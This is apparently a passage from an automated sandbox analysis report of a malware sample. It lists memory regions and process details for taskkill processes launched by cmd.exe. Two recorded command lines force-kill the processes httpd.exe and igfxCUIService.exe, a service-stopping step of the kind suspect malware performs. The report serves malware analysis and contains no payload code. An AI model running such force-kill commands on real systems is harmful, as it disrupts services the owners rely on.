|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00076fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000080000 | 0x00080000 | 0x00081fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000d0000 | 0x000d3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00120000 | 0x00186fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x001b0000 | 0x0026ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000280000 | 0x00280000 | 0x00280fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x003d0000 | 0x003e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00577fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000580000 | 0x00580000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000860000 | 0x00860000 | 0x01c5ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001c60000 | 0x01c60000 | 0x01c9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d10000 | 0x01d10000 | 0x01d4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001db0000 | 0x01db0000 | 0x01deffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001df0000 | 0x01df0000 | 0x01eeffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01ef0000 | 0x021befff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002210000 | 0x02210000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002250000 | 0x02250000 | 0x0228ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002320000 | 0x02320000 | 0x0235ffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a730000 | 0x6a747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a750000 | 0x6a7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a8a0000 | 0x6a98afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a990000 | 0x6a99efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a9a0000 | 0x6a9a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9b0000 | 0x6a9c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a9d0000 | 0x6aa04fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM httpd.exe /IM httpd.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:11 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x114 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7DC
0x
3EC
0x
7E0
0x
57C
0x
640
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x000b0000 | 0x00116fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00130000 | 0x00133fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000500000 | 0x00500000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | Readable |
|
|
|
|
| kernelbase.dll.mui | 0x00870000 | 0x0092ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000940000 | 0x00940000 | 0x0097ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000980000 | 0x00980000 | 0x009bffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x009f0000 | 0x00a05fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x01e0ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001e70000 | 0x01e70000 | 0x01eaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f00000 | 0x01f00000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f40000 | 0x01f40000 | 0x0203ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02040000 | 0x0230efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002310000 | 0x02310000 | 0x0234ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x0238ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002420000 | 0x02420000 | 0x0245ffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a710000 | 0x6a7a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a8c0000 | 0x6a8d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a8f0000 | 0x6a918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a920000 | 0x6a97bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a980000 | 0x6a989fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a990000 | 0x6a9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a9d0000 | 0x6a9defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9e0000 | 0x6a9f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6aa00000 | 0x6aa0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM igfxCUIService.exe /IM igfxCUIService.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x148 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7C0
0x
814
0x
824
0x
828
0x
894
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00210000 | 0x002cffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000320000 | 0x00320000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00560000 | 0x00575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000580000 | 0x00580000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000640000 | 0x00640000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000690000 | 0x00690000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000790000 | 0x00790000 | 0x00917fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000920000 | 0x00920000 | 0x00aa0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x01eaffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01faffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002010000 | 0x02010000 | 0x0204ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02050000 | 0x0231efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002340000 | 0x02340000 | 0x0237ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002480000 | 0x02480000 | 0x024bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024f0000 | 0x024f0000 | 0x0252ffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a730000 | 0x6a747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a750000 | 0x6a7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a8a0000 | 0x6a98afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a990000 | 0x6a99efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a9a0000 | 0x6a9a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9b0000 | 0x6a9c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a9d0000 | 0x6aa04fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
